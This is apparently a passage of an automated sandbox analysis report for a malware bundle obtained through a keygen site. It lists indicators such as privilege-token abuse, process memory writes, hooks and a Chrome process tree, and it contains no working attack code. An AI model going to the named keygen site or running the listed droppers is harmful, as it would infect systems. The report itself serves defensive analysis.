017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 4804 PING.EXE 7984 PING.EXE 8196 PING.EXE 4696 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 275 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 286 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 678 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 686 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exesetups.tmpmultitimer.exepid process 2892 chrome.exe 2892 chrome.exe 616 chrome.exe 616 chrome.exe 4220 chrome.exe 4220 chrome.exe 4572 chrome.exe 4572 chrome.exe 5636 chrome.exe 5636 chrome.exe 5700 chrome.exe 5700 chrome.exe 5164 chrome.exe 5164 chrome.exe 4584 chrome.exe 4584 chrome.exe 5040 chrome.exe 5040 chrome.exe 5428 chrome.exe 5428 chrome.exe 5428 chrome.exe 5428 chrome.exe 5128 setups.tmp 5128 setups.tmp 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe 4272 multitimer.exe -
Suspicious behavior: MapViewOfSection 9 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeb9706c20.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeb9706c20.exepid process 6008 MicrosoftEdgeCP.exe 6008 MicrosoftEdgeCP.exe 6820 MicrosoftEdgeCP.exe 1848 b9706c20.exe 4624 MicrosoftEdgeCP.exe 4624 MicrosoftEdgeCP.exe 3216 MicrosoftEdgeCP.exe 3216 MicrosoftEdgeCP.exe 9016 b9706c20.exe -
Suspicious behavior: SetClipboardViewer 3 IoCs
Processes:
6616674.exe1114116.exe2837158.exepid process 3480 6616674.exe 5772 1114116.exe 10136 2837158.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Setup.exeaskinstall20.exetaskkill.exemultitimer.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemultitimer.exevpn.tmppowershell.exepowershell.exeAwesomePoolU1.exeschtasks.exeWerFault.exeRmSetp.exeWerFault.exeWerFault.exefile.exeWerFault.exeWerFault.exerundll32.exesvchost.exedescription pid process Token: SeDebugPrivilege 4132 Setup.exe Token: SeCreateTokenPrivilege 1508 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1508 askinstall20.exe Token: SeLockMemoryPrivilege 1508 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1508 askinstall20.exe Token: SeMachineAccountPrivilege 1508 askinstall20.exe Token: SeTcbPrivilege 1508 askinstall20.exe Token: SeSecurityPrivilege 1508 askinstall20.exe Token: SeTakeOwnershipPrivilege 1508 askinstall20.exe Token: SeLoadDriverPrivilege 1508 askinstall20.exe Token: SeSystemProfilePrivilege 1508 askinstall20.exe Token: SeSystemtimePrivilege 1508 askinstall20.exe Token: SeProfSingleProcessPrivilege 1508 askinstall20.exe Token: SeIncBasePriorityPrivilege 1508 askinstall20.exe Token: SeCreatePagefilePrivilege 1508 askinstall20.exe Token: SeCreatePermanentPrivilege 1508 askinstall20.exe Token: SeBackupPrivilege 1508 askinstall20.exe Token: SeRestorePrivilege 1508 askinstall20.exe Token: SeShutdownPrivilege 1508 askinstall20.exe Token: SeDebugPrivilege 1508 askinstall20.exe Token: SeAuditPrivilege 1508 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1508 askinstall20.exe Token: SeChangeNotifyPrivilege 1508 askinstall20.exe Token: SeRemoteShutdownPrivilege 1508 askinstall20.exe Token: SeUndockPrivilege 1508 askinstall20.exe Token: SeSyncAgentPrivilege 1508 askinstall20.exe Token: SeEnableDelegationPrivilege 1508 askinstall20.exe Token: SeManageVolumePrivilege 1508 askinstall20.exe Token: SeImpersonatePrivilege 1508 askinstall20.exe Token: SeCreateGlobalPrivilege 1508 askinstall20.exe Token: 31 1508 askinstall20.exe Token: 32 1508 askinstall20.exe Token: 33 1508 askinstall20.exe Token: 34 1508 askinstall20.exe Token: 35 1508 askinstall20.exe Token: SeDebugPrivilege 4840 taskkill.exe Token: SeDebugPrivilege 4436 multitimer.exe Token: SeDebugPrivilege 2296 MicrosoftEdge.exe Token: SeDebugPrivilege 2296 MicrosoftEdge.exe Token: SeDebugPrivilege 2296 MicrosoftEdge.exe Token: SeDebugPrivilege 2296 MicrosoftEdge.exe Token: SeDebugPrivilege 6132 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 6132 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 6132 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 6132 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4272 multitimer.exe Token: SeDebugPrivilege 1968 vpn.tmp Token: SeDebugPrivilege 1968 vpn.tmp Token: SeDebugPrivilege 5604 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 1156 AwesomePoolU1.exe Token: SeDebugPrivilege 4980 schtasks.exe Token: SeDebugPrivilege 4980 schtasks.exe Token: SeRestorePrivilege 6888 WerFault.exe Token: SeBackupPrivilege 6888 WerFault.exe Token: SeDebugPrivilege 6428 RmSetp.exe Token: SeDebugPrivilege 6888 WerFault.exe Token: SeDebugPrivilege 7004 WerFault.exe Token: SeDebugPrivilege 3468 WerFault.exe Token: SeDebugPrivilege 5028 file.exe Token: SeDebugPrivilege 848 WerFault.exe Token: SeDebugPrivilege 4064 WerFault.exe Token: SeDebugPrivilege 3740 rundll32.exe Token: SeTcbPrivilege 1248 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exechrome.exeSetup3310.tmpIBInstaller_97039.tmplokpto41glk.exevict.tmp45y4koqd0ts.tmpvpn.tmppid process 616 chrome.exe 616 chrome.exe 616 chrome.exe 616 chrome.exe 616 chrome.exe 616 chrome.exe 616 chrome.exe 616 chrome.exe 616 chrome.exe 616 chrome.exe 616 chrome.exe 616 chrome.exe 5576 chrome.exe 5576 chrome.exe 4652 Setup3310.tmp 3888 IBInstaller_97039.tmp 5928 lokpto41glk.exe 2076 vict.tmp 988 45y4koqd0ts.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp 1968 vpn.tmp -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMaskVPNUpdate.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exepid process 2296 MicrosoftEdge.exe 6008 MicrosoftEdgeCP.exe 6008 MicrosoftEdgeCP.exe 5956 MicrosoftEdge.exe 6820 MicrosoftEdgeCP.exe 6820 MicrosoftEdgeCP.exe 4268 MicrosoftEdge.exe 4624 MicrosoftEdgeCP.exe 4624 MicrosoftEdgeCP.exe 6320 MaskVPNUpdate.exe 8228 MicrosoftEdge.exe 3216 MicrosoftEdgeCP.exe 3216 MicrosoftEdgeCP.exe 5172 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 616 wrote to memory of 4084 616 chrome.exe chrome.exe PID 616 wrote to memory of 4084 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 3468 616 chrome.exe chrome.exe PID 616 wrote to memory of 2892 616 chrome.exe chrome.exe PID 616 wrote to memory of 2892 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe PID 616 wrote to memory of 636 616 chrome.exe chrome.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 9740 attrib.exe 8768 attrib.exe 6164 attrib.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenninja.com/1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffe7d2b6e00,0x7ffe7d2b6e10,0x7ffe7d2b6e202⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1556 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1744 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1496 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4700 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5648 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5684 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5848 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings2⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6c6407740,0x7ff6c6407750,0x7ff6c64077603⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5956 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5592 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5492 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5468 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5388 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5288 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5600 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4904 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3740 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4084 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6028 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5236 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5288 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6232 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6364 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5736 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6636 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6792 /prefetch:82⤵
-
